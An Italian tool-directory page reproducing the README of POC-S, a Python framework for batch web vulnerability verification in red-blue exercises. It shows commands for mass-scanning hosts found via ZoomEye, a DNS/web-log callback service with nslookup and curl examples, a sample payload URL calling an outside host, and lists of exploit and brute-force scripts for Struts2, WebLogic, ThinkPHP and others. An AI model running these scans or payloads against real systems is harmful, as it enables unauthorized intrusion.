Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
POC-S — Versione potenziata di POC-T, POC-S, utilizzata per la rapida verifica delle vulnerabilità delle applicazioni Web negli esercizi di cyber defense (red-blue team). Potenzia le funzionalità e classifica gli script, include dnslog integrato, e la piattaforna integra POC ad alta disponibilità da macchine virtuali vulhub e altri progetti open-source. | Kitploit
Strumenti/GitHubGitHub/jiangsir404/poc-s
RicognizioneScanner di VulnerabilitàFramework di ExploitRaccolta InformazioniSicurezza WebFuzzingPenetration TestingAnalisi DNS
GitHubjiangsir404/poc-s

POC-S

Vedi Repository
356646 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

Versione potenziata di POC-T, POC-S, utilizzata per la rapida verifica delle vulnerabilità delle applicazioni Web negli esercizi di cyber defense (red-blue team). Potenzia le funzionalità e classifica gli script, include dnslog integrato, e la piattaforna integra POC ad alta disponibilità da macchine virtuali vulhub e altri progetti open-source.

Condividi

POC-S: Versione Potenziata di POC-T

La documentazione wiki di POC-T si trova nella directory doc

Prefazione: attualmente

Dichiarazione di esonero legale

Usare POC-S per attaccare un bersaglio senza previo consenso di entrambe le parti è illegale. POC-S è destinato esclusivamente a scopi di test di sicurezza.

Caratteristiche

  • Compatibile con la sintassi di POC-T
  • Buona categorizzazione dei POC, modalità di caricamento flessibile, supporto per caricamento di singoli file, batch e directory arbitrarie
  • Fornisce comandi terminale pocs/poc-s, separando il framework dai POC, consentendo di posizionare POC personalizzati in qualsiasi directory
  • Fornisce una piattaforma DNS semplice, necessita solo di un dominio e un IP pubblico per funzionare, utile per la verifica rapida di blind command injection e blind SQL injection, semplice ed efficiente.
  • Fornisce buoni script di unit test

TODO

  • Raccolta e miglioramento dei POC basati su vulhub e progetti open source, per i dettagli vedere la mia categorizzazione dei POC
  • Fornisce il parametro --init per aggiornare dinamicamente il file di configurazione tookit.conf, es: --init zoomeye, inizializza le informazioni di configurazione di zoomeye
  • Aggiunta della piattaforma dnslog e weblog per la verifica rapida delle vulnerabilità
  • Aggiunta dei due plugin di verifica ceye.py e dnslog.py
  • Aggiunta di pocsapi.py, funzionalità simile a sqlmapapi
  • Aggiunta della versione Python 3 di POC-S

Utilizzo

Poiché le interfacce di terze parti richiedono autenticazione, puoi utilizzare il parametro --init per inizializzare la tua configurazione delle interfacce, es: --init zoomeye

root@kitploit:~
pip install pocs

Installazione dal sorgente:

root@kitploit:~
git clone https://github.com/jiangsir404/POC-S.git
mv pocs/toolkit.conf.bak mv pocs/toolkit.conf
python setup.py install

Se con pip install pocs si verifica l'errore 'Some files missing', è necessario andare nella directory di installazione di pocs (python2.7\Lib\site-packages\pocs) e rinominare tookit.conf. Se si verifica l'errore WARNING: Generating metadata for package cachetools produced metadata for project name unknown. Fix your #egg=cachetools fragments., è un problema di dipendenze dei pacchetti. Controlla e aggiorna le versioni di alcuni pacchetti: setuptools==39.0.1 cachetools==3.1.1 google-api-python-client==1.7.11

  1. Modalità di caricamento dei plugin più flessibile
root@kitploit:~
pocs -s test/test2.py -iS 127.0.0.1 #加载script/test/test2.py脚本
pocs -s test2 -iS 127.0.0.1 # 加载script/test2.py脚本

pocs -b test -iS 127.0.0.1 # 批量加载/script/test目录下的所有脚本
pocs -b test -s test2.py -iS 127.0.0.1 #加载script/test/test2.py脚本

pocs -s myself_script.py -iS 127.0.0.1 # 加载自定义的脚本和脚本目录
pocs -b mydir -iS 127.0.0.1
  1. Utilizzo dei motori di ricerca
root@kitploit:~
pocs --init zoomeye //初始化zoomeye的配置信息
pocs -b redis -t 50 -aZ "port:6379" --limit 50 -o res.txt
pocs -s test2.py -aZ "ThinkPHP"

Utilizzo di ZoomEye per cercare in batch la vulnerabilità CNVD-2020-10487 tomcat ajp lfi

root@kitploit:~
pip install pocs
pocs -b apache -aZ "app:tomcat" --limit 50 -t 30 -o ajp.txt

  1. Utilizzo della piattaforma dnslog

Se sei ancora preoccupato per l'instabilità di ceye e non hai tempo/energia per configurare una piattaforma DNSLog (che richiede due domini, un IP pubblico e la possibilità di modificare i server DNS del dominio), allora vale la pena provare la piattaforma dnslog semplice offerta da POC-S. Richiede solo un dominio e un IP pubblico per essere configurata e fornisce API per la verifica (senza interfaccia).

Supponendo che dnslog.xxx.cn sia il tuo dominio pubblico e x.x.x.x l'IP pubblico, assicurati che dnslog.xxx.cn risolva correttamente a x.x.x.x, altrimenti non sarà possibile accedere all'API. Esegui il comando sul server pubblico (x.x.x.x):

root@kitploit:~
pip install pocs
pocs_dnslog -h 0.0.0.0 -p 88(se non installato con pip, puoi eseguire direttamente lo script pocs.dnslog.py)
>>> dns domain: dnslog.xxx.cn
>>> api key: rivir
>>>dns ip: x.x.x.x

Comando dns log, supporta solo il comando nslookup: nslookup 1234.dnslog.xxx.cn x.x.x.x

Se vuoi usare il comando ping 1234.dnslog.xxx.cn, puoi anche configurare server DNS personalizzati per il dominio xxx.cn (vedi la configurazione di DNSLog).

web log command: curl http://dnslog.xxx.cn:88/weblog/poc123

Indirizzo API: http://x.x.x.x:88/api/?token={token}&type={dns}&filter=1234.dnslog.xxx.cn Parametri: - token obbligatorio, api_key inserita durante la configurazione del dnslog - type obbligatorio, valori possibili: dns/web - filter opzionale, filtra i record corrispondenti esattamente

POC

pocs offre una categorizzazione dei plugin più flessibile. Attualmente, i POC raccolti si dividono in quattro categorie: Fuzz POC, OWASP POC, Vuln POC, Tool POC. Per quanto riguarda i POC, cercheremo di raccogliere quelli già esistenti su GitHub, ma non saranno troppi; sarà comunque necessario che ciascuno raccolga e organizzi i propri. f

La scrittura dei POC sarà il più possibile standardizzata, seguendo lo stile di POC-T. Esempio:

root@kitploit:~
#!/usr/bin/env python		
#coding:utf-8

"""
ThinkPHP5 <=5.0.22/<=5.1.29 远程代码执行漏洞

Desc
    2018年12月10日中午,thinkphp官方公众号发布了一个更新通知,包含了一个5.x系列所有版本存在被getshell的高风险漏洞。
    由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,
    受影响的版本包括5.0.23和5.1.31之前的所有版本,推荐尽快更新到最新版本。
Version
	ThinkPHP5.0 版本 <= 5.0.22 ThinkPHP5.1 版本 <= 5.1.29
Usage:
	1. python POC-S.py -s 
	2. POC: /wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://lj.s7star.cn/info.txt
Referer
	https://www.seebug.org/vuldb/ssvid-9771
"""

import requests

def poc(url):
    pass

Vuln POC

Provengono principalmente dai plugin di vulhub e dai plugin POC inclusi in POC-T, aggiungendo solo POC ad alta affidabilità. Ogni POC elencato di seguito è stato verificato personalmente in un ambiente configurato ad hoc. Se ci sono POC errati, per favore apri una issue per contattarmi.

  • struts2
    • s2-005.py
    • s2-015.py
    • s2-016.py
    • s2-032.py
    • s2-045.py
    • s2-052.py
    • s2-053.py
    • s2-057.py
    • struts2-devmode.py
  • weblogic
    • weblogic-ssrf-netmap.py cve-2014-4210
    • weblogc-cve-2017-10271.py (CVE-2017-10271)
    • weblogic-cve-2018-2628.py
    • weblogic-cve-2019-2725.py
    • weblogic-cve-2019-2729.py

Fuzz POC

Fonte: boy-hack/POC-T

  • bakfile: rilevamento file di backup
  • crossdomain: crossdomain
  • dzxss
  • gitleak
  • issparse
  • ms15-034
  • phpinfo
  • phpmyadmin
  • svnleak
  • swf
  • tomcat_xmlleak
  • wordspace

OWASP POC

Fonte: script di rilevamento di hunter

  • cmd_exec
  • sql_injection
  • xss
  • xxe
  • csrf
  • jsonp_xss
  • jsonp_hijacking
  • file_read
  • ssti
  • ssrf

Tool Poc

Alcuni POC di strumenti comuni, forniscono funzionalità come motori di ricerca, ricerca di informazioni, ecc.

  • bing-dork ricerca bing
  • bingc basato sul motore di ricerca Bing: IP reverse lookup di domini, domini di classe C
  • google-dork ricerca google
  • cdn-detect rilevamento CDN
  • waf rileva WAF e restituisce URL senza WAF
  • craw estrae indirizzi correlati dai link
  • vulscan rileva vulnerabilità SQL injection
  • portscan scansione delle porte, rileva servizi con password deboli
  • domain2ip query IP da dominio
  • whois query informazioni whois
  • icp query ICP

Altri POC open source come il progetto https://github.com/boy-hack/airbug raccolgono alcuni POC utilizzabili direttamente, ma hanno una libreria HackReqeust che è per Python 3, è necessario modificarla per Python 2. Puoi installare direttamente la mia libreria modificata per Python 2: https://github.com/jiangsir404/hack-requests

Scarica lo strumento
  • weblogic-cve-2020-2551.py
  • weblogic-upload-getshell.py (CVE-2018-2894)
  • thinkphp
    • 5-rce
    • 5.0.23-rce
  • Jenkins
    • jenkins-cve-2015-8103.py
    • jenkins-cve-2017-1000353.py
    • jenkins-cve-2018-1000861.py
  • weakpass
    • mysql
    • redis
    • mongo
    • sqlserver
    • ftp
    • telent
    • web弱口令(通用无验证码后台)
    • http-basic-auth
    • coremail
    • jboss
    • jenkins
    • weblogic
  • unauth
    • redis-unauth.py
    • mongodb-unauth.py
    • memcached-unauth.py
    • elasticsearch-unauth.py
    • kubernetes-unauth.py
    • jenkins-unauth.py
    • docker-unauth-rce.py
    • hadoop-unauth.py
  • apache
    • CNVD-2020-10487 tomcat-ajp-lfi.py
    • tomcat-upload.py
    • tomcat-weak-pass.py
  • Citrix
    • cve-2019-19781
  • supervisor
    • supervisord-RCE-CVE-2017-11610.py
  • Jboss
    • jboss-rce.py
    • CVE-2017-12149
    • CVE-2013-4810
  • spring
    • spring-oauth2-rce.py
    • cve-2018-1273
  • phpmyadmin
    • phpmyadmin-auth-rce.py
    • phpmyadmin4.8.1-RFI.py
  • kibana
    • cve-2019-7609
    • cve-2018-17246
  • php
    • fpm-rce.py
    • CVE-2019-11043
    • CVE-2018-19518
  • discuz
    • x3.4-arbitrary-file-deletion
  • zabbix
    • zabbix-jsrpc-mysql-exp.py
    • zabbix-jsrpc-sqli.py
    • zabbix-weakpass.py
    • zabbix_latest_sqli.py
  • dns-zone-transfer
  • confluence
    • confulence-traversal.py
    • confluence vulnerabilità di path traversal ed esecuzione di comandi